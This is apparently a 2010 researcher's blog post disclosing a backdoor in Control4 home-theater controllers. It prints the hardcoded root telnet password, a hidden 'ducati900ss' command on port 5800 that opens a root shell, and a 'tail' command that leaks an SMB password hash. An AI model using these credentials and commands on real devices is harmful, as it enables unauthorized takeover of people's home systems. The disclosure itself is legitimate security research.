Control4 gear is umm... backdoored, I guess?
Wednesday, October 13, 2010
So I bought a few Control4 items off ebay so I could get a feel for Killerbee. This was sort of FAIL due to my purchase of older EmberZnet enabled gear. I’ll get to that story in another post.
To make a long story short I had to hold the only button on the front of my Control 4 Home Theater Controller AVMHTC1B in order to reset its network settings. Once I did this the device instantly took a dhcp address on my LAN. You know what happened next:
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-13 15:14 EDT
Nmap scan report for 10.0.1.14
Host is up (0.026s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
5100/tcp open admd
5101/tcp open admdog
5560/tcp open isqlplus
5800/tcp open vnc-http
6000/tcp open X11
6100/tcp open unknown
again to keep this long story short I found the password referenced on the control4 dealer forums along with some interesting quotes that I will share later. Eventually I simply took the device apart and mounted the USB drive that I found inside. Adding a line to the passwd file was easy enough.
On the exact same day I stumbled upon this web page:
http://control4brasil.forumais.com/documentacoes-f1/touch-screen-calibration-t2.htm
“10.5 Touch screen
This will also work on the other touch screens but this is the only way to re-calibrate the 10.5.
telnet into the Touch screen.
start>
run>
telnet (IP address of the touchscreen)
login: root
password: t0talc0ntr0l4!
>cd etc
>rm pointercal
>reboot.”
I also ran across this one:
http://code.google.com/p/c4touch/wiki/TelnetLoginInfo
“TelnetLoginInfo
The userid and password required to login to your Control4 controller via telnet.
username:root password:t0talc0ntr0l4!
Note that the 0s above are zeros and not the letter oh.”
At this point you are going “OK so where is the backdoor...”, if you thought it was the hardcoded root password you are wrong.
$ telnet 10.0.1.14
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
ht-controller-000FFF0370A7 login: root
Password:
Welcome to
____ _ _ __
/ __| _| |_ | | / |
| | ___ ___|_ _|__ ___ | |/ O |_
| | / \| _ \| | __\/ \| |__ _|
| |__| O | | | | | | | O | | | |
\____\___/|_| |_|_|_| \___/|_| |_|
T E C H N O L O G I E S
Home Theater Controller
Console
For further information check:
BusyBox v1.1.3 (2008.10.09-22:51+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
~# id
uid=0(root) gid=0(root)
Tell me now does THIS resemble a backdoor?
$ telnet 10.0.1.14 5800
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
help
help Help (this command).
status Get enabled/disabled status.
quit Quit the session.
date Get/set date (MM/DD/YYYY).
time Get/set time (HH:MM:SS).
timezone Get/set timezone (zone name).
timezones Get list of timezones.
enable Enable daemon.
disable Disable daemon.
ntp NTP daemon (start|stop|restart).
oldupdate Update pre 1.3 release system
version Get package versions.
reboot Reboot machine.
suspend Stop daemon.
resume Start daemon.
net Network configuration (see net help).
kill Kill daemon
restart Restart all enabled processes.
sysinfo Get system info (XML result).
procpoll Get process info (XML result).
syslog Configure logging.
tail Tail a file.
whoami Return IP of this connection.
OK
ducati900ss
/bin/sh: can't access tty; job control turned off
BusyBox v1.1.3 (2008.10.09-22:51+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/mnt/jffs2/etc/sysman.d# id
id
uid=0(root) gid=0(root)
/mnt/jffs2/etc/sysman.d#
/mnt/jffs2/etc/sysman.d# exit
exit
OK
Invalid command
OK
If you missed it “ducati900ss” is NOT a standard command.
/mnt/ram/tmp# strings /control4/bin/sysmand | grep ducati
ducati900ss
If you run strings you can see it hidden away:
version
Get package versions.
reboot
Reboot machine.
suspend
Stop daemon.
resume
Start daemon.
Network configuration (see net help).
ducati900ss
Command shell
kill
Kill daemon
restart
Restart all enabled processes.
sysinfo
Get system info (XML result).
Rebooting system
/bin/sh -i <&%d >&%d 2>&1
Killed %s
Can't kill %s
%s is not running
Tail seems to be a bit interesting as well
$ telnet 10.0.1.14 5800
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
tail /etc/smbpasswd
root:0:D480EA9533C500D4AAD3B435B51404EE:329153F560EB329C0E1DEEA55E88A1E9:[UX ]:LCT-410018DC:
(this cracks to “ROOT”)
Unfortunately the root shadow can’t be read due to the number of lines tail reads by default
$ telnet 10.0.1.14 5800
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
tail /etc/passwd
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:
games:*:12:100:games:/usr/games:
gopher:*:13:30:gopher:/usr/lib/gopher-data:
ftp:*:14:50:FTP User:/:
nobody:*:99:99:Nobody:/:
You should note that I have seen other “ducati” references in log files posted on various forums. One example follows (it contains 2 passwords):
http://www.c4dealers.com/viewtopic.php?pid=11785#p11785
07/17/2008 20:46:49 Sending packet to device Mini Touch Screen(192.168.1.105). Message is: ducati996
07/17/2008 20:46:49 Sending packet to device Mini Touch Screen(192.168.1.105). Message is: ducati900ss
Hrmm... seems like fun to be had. More soon, especially since the system seems to take debian woody arm .deb files!
